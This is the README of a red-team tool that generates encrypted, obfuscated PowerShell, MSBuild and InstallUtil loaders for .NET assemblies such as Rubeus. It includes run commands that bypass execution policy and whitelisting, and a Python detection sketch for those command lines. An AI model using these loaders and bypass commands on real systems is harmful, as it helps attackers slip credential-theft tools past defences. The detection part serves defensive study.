# go-assembly-ldr
`go-assembly-ldr` is an offensive security tool designed for generating encrypted and obfuscated loaders for .NET assemblies. It supports PowerShell, MSBuild, and InstallUtil loader types, with RC4 or AES encryption, and provides variable obfuscation to evade (some) detection.
> **WARNING**: This tool is for **authorized security testing only**. Unauthorized use may violate laws and regulations. The author and contributors are not responsible for misuse. Always obtain explicit permission before testing any system.
## Features
- **Loader Types**: Generate PowerShell (`.ps1`), MSBuild (`.csproj`), or InstallUtil (`.cs`) loaders.
- **Encryption**: Supports RC4 or AES (256-bit) encryption for assembly payloads.
- **Obfuscation**: Randomizes variable names in generated loaders to hinder static analysis.
- **Cross-Platform Builds**: Makefile supports building for Linux, Windows, and macOS (amd64, 386, arm64).
- **Customizable**: Configurable key length, obfuscation length, and .NET architecture (x86/x64 for MSBuild).
## Installation
### Prerequisites
- **Go**: Version 1.21 or later.
- **Make**: For building with the provided Makefile.
- **Git**: To clone the repository.
### Steps
- Clone the repository:
```
$ git clone https://github.com/your-username/go-assembly-ldr.git
$ cd go-assembly-ldr
```
- Install dependencies:
```
$ go mod tidy
```
- Build for all platforms:
```
$ make all
```
- Binaries are written to the `build/` directory for Linux, Windows, and macOS. Alternatively, build for a specific platform:
```
$ make linux-amd64
$ make windows-amd64
$ make darwin-arm64
```
- (Optional) Run directly with Go:
```
$ go run main.go -f <input_file> -t <loader_type> -e <encryption_type>
```
## Usage
### Command-Line Flags
```
Usage of ./go-assembly-ldr-<platform>-<arch>:
  -dotnet-architecture string
        .net architecture for msbuild: x86|x64 (default "x64")
  -e string
        encryption type: rc4|aes (default "rc4")
  -f string
        input file path
  -key-len int
        length of encryption key (default 32)
  -obf-len int
        length of obfuscated strings (default 8)
  -t string
        loader type: powershell|msbuild|installutil (default "powershell")
```
## Examples
### Generate a PowerShell Loader with AES Encryption
```
$ build/go-assembly-ldr-linux-amd64 \
    -f Rubeus.exe \
    -t powershell \
    -e aes \
    -obf-len 10 \
    -key-len 32
```
- Output: `Rubeus.exe_reflective.ps1`
- Run with: `powershell -ExecutionPolicy Bypass -File Rubeus.exe_reflective.ps1`
- Call the assembly method: `[<namespace>.<class>]::<method>("arg1 arg2".Split())`
### Generate an MSBuild Loader with RC4 Encryption
```
$ build/go-assembly-ldr-linux-amd64 \
    -f Rubeus.exe \
    -t msbuild \
    -e rc4 \
    -obf-len 12 \
    -key-len 16 \
    -dotnet-architecture x86
```
- Output: `Rubeus.exe_msbuild.csproj`
- Run with: `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe Rubeus.exe_msbuild.csproj`
- Modify `string[] <var> = new string[] { "" };` in the .csproj to add arguments
### Generate an InstallUtil Loader with AES Encryption
```
$ build/go-assembly-ldr-linux-amd64 \
    -f Rubeus.exe \
    -t installutil \
    -e aes \
    -obf-len 8 \
    -key-len 32
```
- Output: `Rubeus.cs`
- Compile with: `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /platform:x64 /out:Rubeus.exe Rubeus.cs`
- Execute with: `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /U /logfile= /LogToConsole=false Rubeus.exe`
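
For defenders, the run commands in the three examples above leave recognizable process-creation command lines. The following detection sketch is an added example, not part of this project: the rule names and `SAMPLE_EVENTS` lines are constructed for illustration, and the file-name rule assumes the default output names shown above were not changed.

```python
import ntpath
import re

# Constructed process-creation command lines (not real telemetry).
SAMPLE_EVENTS = [
    r'powershell -ExecutionPolicy Bypass -File Rubeus.exe_reflective.ps1',
    r'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe Rubeus.exe_msbuild.csproj',
    r'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /U /logfile= /LogToConsole=false Rubeus.exe',
    r'"C:\Program Files\Microsoft Visual Studio\MSBuild\Current\Bin\MSBuild.exe" App.csproj /t:Build',
    r'powershell.exe -ep bypass -NoProfile -File C:\ops\backup.ps1',
]

def split_cmdline(cmdline):
    """Return (lowercased image base name, lowercased argument list)."""
    toks = [t.strip('"').lower() for t in re.findall(r'"[^"]*"|\S+', cmdline)]
    return (ntpath.basename(toks[0]), toks[1:]) if toks else ("", [])

def is_exec_policy_flag(tok):
    """True for -ep or any prefix of -ExecutionPolicy at least two letters long."""
    name = tok.lstrip("-/")
    return tok[:1] in "-/" and (
        name == "ep" or (len(name) >= 2 and "executionpolicy".startswith(name)))

def classify(cmdline):
    """Return the sorted list of (hypothetical) rule names a command line matches."""
    image, args = split_cmdline(cmdline)
    hits = set()
    if image in ("powershell.exe", "powershell", "pwsh.exe", "pwsh"):
        bypass = any(is_exec_policy_flag(a) and b == "bypass"
                     for a, b in zip(args, args[1:]))
        if bypass and any(a.endswith(".ps1") for a in args):
            hits.add("ps_policy_bypass_script")  # broad: also fires on admin scripts
        if any(a.endswith("_reflective.ps1") for a in args):
            hits.add("default_output_name")
    elif image in ("msbuild.exe", "msbuild"):
        if any(a.endswith("_msbuild.csproj") for a in args):
            hits.add("default_output_name")
    elif image in ("installutil.exe", "installutil"):
        # /U with an empty /logfile= and console logging disabled, as in the README.
        if {"/u", "/logfile=", "/logtoconsole=false"} <= set(args):
            hits.add("installutil_silent_uninstall")
    return sorted(hits)

if __name__ == "__main__":
    for line in SAMPLE_EVENTS:
        print(classify(line), "<-", line)
```

The last two sample lines show the trade-off: an ordinary Visual Studio build produces no hit, while a legitimate admin script run with a policy bypass does, so that rule needs correlation with parent process or script path before alerting.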
## Automated Releases
Check the GitHub Releases page for the new release with attached binaries.
## License
This project is licensed under the GNU GENERAL PUBLIC LICENSE. See the LICENSE file for details.
## Disclaimer
`go-assembly-ldr` is provided "as is" without warranty. The author and contributors are not liable for any damages or legal consequences arising from its use. Use responsibly and only in authorized environments.